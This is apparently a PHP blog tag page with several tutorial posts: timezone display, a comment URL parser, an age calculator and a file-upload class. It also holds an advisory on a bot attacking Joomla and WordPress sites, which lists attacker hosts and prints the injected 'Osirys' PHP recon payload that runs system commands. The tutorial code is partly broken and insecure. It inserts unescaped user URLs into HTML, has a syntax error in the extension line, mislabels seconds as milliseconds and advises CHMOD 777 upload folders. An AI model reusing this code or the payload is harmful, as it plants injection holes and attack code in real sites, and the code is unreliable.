Posts tagged php

Display timezone-specific dates in PHP

Apr 17th

Posted by alex in PHP

No comments

It's common to have a website designed for one country (For example Spain or the UK) and have it in a server elsewhere (In the US for example). You will notice that sometimes when displaying a date this way, it shows the local time at the server!

Instead of manually correcting this time difference there is a much safer way of getting around this issue, using built-in PHP functions:

Take a look at this:

<?php
$timezone = new DateTimeZone( "Europe/Madrid" );
$date = new DateTime();
$date->setTimezone( $timezone );
echo  $date->format( 'H:ia  (D, M jS, Y)' );
?>

Which would generate the following output (At the time of writing of course!)

22:52pm (Sat, Apr 17th, 2010)

As you can see it is extremely easy to set up new timezones and to display dates for those zones specifically. You could even prompt your user for his/her own timezone, or add it as a specific setting for them :)

, ,

New threat for all Joomla and WordPress installations

Sep 24th

Posted by alex in Security

3 comments

There is a new BOT out there, and one of the bad ones. I have started receiving traffic from it in my servers over the past week, and after some investigation it turns out it is quite a powerful bot, and so simple to use even a kid with a computer could use it.

The bot attacks mainly Joomla and WordPress installations, the Firestats plugin for WordPress version 1.6.2 has a known vulnerability that is exploited by this bot.

If successful, the bot will usually get your admin password and send it to a server somewhere, other versions f** your server up... it depends.

The bot is basically a top All-In-One product, that acts as a:

  • RFI Scanner
  • RFI Scan & Exploit
  • Joomla RFI Scan & Exploit
  • Milw0rm Search
  • Google bypass
  • Message Spy & Save
  • Auto Spreading

The last known spreader for the bot is the Fx29Spreadz v1.0 (Apr. 2009) which can be used from a server with a PHP Shell.

IPs and servers:

This bot has used the following IPs and hosts (That I know of)

  • 62.15.230.250
  • 210.68.188.206
  • 211.239.150.144
  • 125.251.133.3
  • 250.230.15.62.static.jazztel.es
  • buminch.org
  • www.framoss.ru

It has compromised servers in Republic of Korea, Taiwan and some other countries.

Injections:

The bot basically tries to insert the following PHP line:

 
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
 

Although there is another variation which inserts:

 
    < ?php
    function ConvertBytes($number) {
    $len = strlen($number);
    if($len < 4) {
    return sprintf(”%d b”, $number); }
    if($len >= 4 && $len < =6) {
    return sprintf(”%0.2f Kb”, $number/1024); }
    if($len >= 7 && $len < =9) {
    return sprintf(”%0.2f Mb”, $number/1024/1024); }
    return sprintf(”%0.2f Gb”, $number/1024/1024/1024); }
 
    echo “Osirys<br>”;
    $un = @php_uname();
    $id1 = system(id);
    $pwd1 = @getcwd();
    $free1= diskfreespace($pwd1);
    $free = ConvertBytes(diskfreespace($pwd1));
    if (!$free) {$free = 0;}
    $all1= disk_total_space($pwd1);
    $all = ConvertBytes(disk_total_space($pwd1));
    if (!$all) {$all = 0;}
    $used = ConvertBytes($all1-$free1);
    $os = @PHP_OS;
 
    echo “0sirys was here and also is a fucking gay..”;
    echo “uname -a: $un”;
    echo “os: $os”;
    echo “id: $id1”;
    echo “free: $free”;
    echo “used: $used”;
    echo “total: $all”;
    exit;
 

Security recommendations:

If your website runs on WordPress, Joomla, Drupal, or other popular CMS you must upgrade all plugins and check for the latest version of the system!
If you have Firestats I recommend deactivating it for some time, until a new version fixing that bug is released, and still, I would wait.
If you have URL rewriting systems, ensure they are up-to-date, and if you built them re-check the security, and never include external files.

Hope this helped you :)

If you found any variations and new stuff about this please comment below

, , , , , , , ,

Parse links in user comments

Sep 13th

Posted by alex in PHP

No comments

When you allow users to comment and post stuff to your website, it is interesting and useful allowing them to post links and other stuff. But how can we do so easily?
Surely there is BBCode, phpBB, allowing only some HTML tags... etc but how easy is this approach for the end user? Of course some users will be familiar with BB code, or with HTML; others will be curious enough to learn how to use it, but most won't. And we want our users to be able to do so.

The solution: URL Parsing

How about this: They simply post the URL of whatever they want to include (A link, a picture, a YouTube video... ) and we detect that, and take the corresponding action.

First of all we need something that detects links, I have written a simple regexp to do so:

 
function parse($text){
		return preg_replace_callback('@(https?://([-\w\.]+)+(:\d+)?(/([\w/_\.-]*(\?\S+)?)?)?)@', 'parseUrl', $text);
	}
 

This is valid for almost all URLs, as long as http is the beggining. This function calls a callback function whenever a URL is found, called parseURL, which will then take care of the URL.

parseURL

Now that the URL is found, we need to take care of it: The url is stored in a parameter returned from the function preg_replace_callback. It is contained in the first element of the returned array.

 
function parseURL($url){
       $link = $url[0];
}
 

We will parse the full url with a built-in function called parse_url(), which will return the following data:

  • scheme - e.g. http
  • host
  • port
  • user
  • pass
  • path
  • query - after the question mark ?
  • fragment - after the hashmark #

To get the file format we will check the extension:

 
$ext = substr(strrchr($url['path']),'.'),1);
 

Image formats:

 
$imgs = array('jpg','jpeg','gif','png','tif'); // You can write more if you want, this is only an example
 

Now let's check if it is or not an image:

 
if(in_array($ext,$imgs)){
          return '<img src="'.$link.'" alt="This is a picture" class="insertedPic" />';
}
 

This way if a user inserts a link to a picture, the picture is displayed. You can now add a link, or change in any way the result of this.

If it is a YouTube video it would also be good to embed it, so we will first check if it is:

 
if(eregi('^(www\.)*(youtube\.).{2,3}$',$url['host'])){ // Check for youtube video
	return youtubeEmbed($url['query']);
}
 

As you can see, if the link comes from youtube, we will embed it using our custom function youtubeEmbed:
youtubeEmbed()

 
	function youtubeEmbed($params){
		parse_str($params);
		if(substr($v , strlen($v)-3 ,3) == '<br '){
			$v = substr($v , 0 ,strlen($v)-3);
		}
		if($v){
 
			return '
<div class="addedLink"/><object width="200px" height="150px" style="display:block; z-index:1"><param name="movie" value="http://www.youtube.com/v/'.$v.'"></param><param name="allowFullScreen" value="true"></param><param name="wmode" value="transparent"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/'.$v.'&rel=1&color1=0xFFFFFF&color2=0x666666&border=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="200" height="150" wmode="transparent"></embed></object><br ';
		}else{
			return false;
		}
	}
</pre/>
I won't go into too much detail here, it is quite simple, we take the parameter $v, which is the video ID, and then we proceed to the video embed...
 
You can do the same with Metacafe, Vimeo, College Humor, Google Video... etc and the process would be basically the same for all.
<h2>Further uses</h2>
 
I use this class to detect internal links in some of my websites. If the link points to a page with a picture for example, I show a small version of it, if it points to a user profile I show the user's name and some data... etc
 
The options are endless, and once you have everything parsed it is very easy to add new stuff. It really makes it simple for users to share pictures and videos, and it is the safest way of doing so, as well as the best way if you ever want to change the behavior, since in the database all you store is the raw URL.
, , , , ,

Calculate age in PHP from timestamp

Sep 8th

Posted by alex in PHP

No comments

If you ever wanted to calculate someone's age in PHP from a birth timestamp, you must take into account that the age is more than the number of years, since days and months are also important, so I wrote a simple function that will return the exact age for a given timestamp:

 
function getAge($birth){
	$t = time();
	$age = ($birth < 0) ? ( $t + ($birth * -1) ) : $t - $birth;
	return floor($age/31536000);
}
 

Basically we first get the current time and store it in a variable (To avoid having to call the function time more than once)
Then we get the age in milliseconds (Taking into account that before 1969 timestamps are negative, thus the ternary operator)

Now we have the date in milliseconds, we divide it by the number of milliseconds in a year (60*60*24*365)

And that is basically it :)

, , , , , , , ,

Easiest PHP file upload

Aug 7th

Posted by alex in PHP

No comments

Hello people,
I want to share with all of you a file upload class I have developed, that makes it stupid simple to upload files haha

The PHP class:

First of all, here is the PHP class you will need:

 
< ?php
//Uploader class, by Alex
// This class is meant to handle all kinds of file uploads for DJs Music
// Images, music... all here
 
class Uploader{
	var $maxSize;
	var $allowedExt;
	var $fileInfo = array();
 
	function config($maxSize,$allowedExt){
		$this->maxSize = $maxSize;
		$this->allowedExt = $allowedExt;
	}
 
function generateRandStr($length){
      $randstr = "";
      for($i=0; $i< $length; $i++){
         $randnum = mt_rand(0,61);
         if($randnum < 10){
            $randstr .= chr($randnum+48);
         }else if($randnum < 36){
            $randstr .= chr($randnum+55);
         }else{
            $randstr .= chr($randnum+61);
         }
      }
      return $randstr;
   }
 
	function check($uploadName){
		if(isset($_FILES[$uploadName])){
			$this->fileInfo['ext'] = substr(strrchr($_FILES[$uploadName]["name"], '.'), 1);
			$this->fileInfo['name'] = basename($_FILES[$uploadName]["name"]);
			$this->fileInfo['size'] = $_FILES[$uploadName]["size"];
			$this->fileInfo['temp'] = $_FILES[$uploadName]["tmp_name"];
			if($this->fileInfo['size']< $this->maxSize){
				if(strlen($this->allowedExt)>0){
					$exts = explode(',',$this->allowedExt);
					if(in_array($this->fileInfo['ext'],$exts)){
						return true;
					}
					echo 'Invalid file extension. Allowed extensions are '.$this->allowedExt;
					return false; //failed ext
				}
				echo 'Sorry but there is an error in our server. Please try again later.';
				return false; //All ext allowed
			}else{
				if($this->maxSize < 1000000){
					$rsi = round($this->maxSize/1000,2).' Kb';
				}else if($this->maxSize < 1000000000){
					$rsi = round($this->maxSize/1000000,2).' Mb';
				}else{
					$rsi = round($this->maxSize/1000000000,2).' Gb';
				}
				echo 'File is too big. Maximum allowed size is '.$rsi;
				return false; //failed size
			}
		}
		echo 'Oops! An unexpected error occurred, please try again later.';
		return false; //Either form not submitted or file/s not found
	}
 
	function upload($name,$dir,$fname=false){
		if(!is_dir($dir)){
			echo 'Sorry but there is an error in our server. Please try again later.';
			return false; //Directory doesn't exist!
		}
		if($this->check($name)){
			//Process upload. All info stored in array fileinfo:
			//Dir OK, keep going:
			//Get a new filename:
			if(!$fname){
				$this->fileInfo['fname'] = $this->generateRandStr(15).'.'.$this->fileInfo['ext'];
			}else{
				$this->fileInfo['fname'] = $fname;
			}
			while(file_exists($dir.$this->fileInfo['fname'])){
				$this->fileInfo['fname'] = $this->generateRandStr(15).'.'.$this->fileInfo['ext'];
			}
			//Unique name gotten
			// Move file:
			if(@move_uploaded_file($this->fileInfo['temp'], $dir.$this->fileInfo['fname'])){
				//Done
				return true;
			}else{
				echo 'The file could not be uploaded, although everything went ok :S ... Please try again later.';
				return false; //File not moved
			}
		}else{
			return false;
		}
	}
 
};
//Initialize the object:
$up = new Uploader;
?>
 

Alright this is the code. You shouldn't have to modify it, simply include it where you process the upload and the class will initiate itself inside the variable $up

Usage:

For this example I will suppose you have a basic HTML form as follows:

 
<form action="process.php" method="post" enctype="multipart/form-data">
<input name="uploadPic" type="file" />
<input name="upload" type="submit" value="Upload" />
</form>
 

As you can see, the action is process.php, which is, in this example, where the picture upload will be processed.

In the file process.php we will first include the upload handler, then configure it, and finally try to upload the file into the directory pictures/. Please take into account that it must be writable (CHMOD 777)

process.php:

 
< ?php
//include the class:
include('handleUpload.php');
$up->config('2000000','jpg,gif,png');
if($up->upload('uploadPic','pictures/')){
	echo 'File uploaded. File information: ';
	echo $up->fileInfo['ext'].'';
	echo $up->fileInfo['name'].'';
	echo $up->fileInfo['size'];
}
// If the file was not uploaded, the error will have been echoed automatically
?>
 

As you can see there is no }else{ because the handler echoes the errors by itself. You can change this behavior easily by setting up your own function as desired.

In this example we have configured it to allow a maximum of 2000000 bytes per upload, and only jpg, gif, and png pictures.

Now that the file is uploaded you have some information about it in the $up object. The format ($up->fileInfo['ext']), the name ($up->fileInfo['name']), and finally the size in bytes ($up->fileInfo['size']).

The handler also generates a random name, and ensures it is not already in the directory. The new name is stored in the fileInfo array as mentioned above.

I hope you found this useful :)

, , , , , , , ,
123»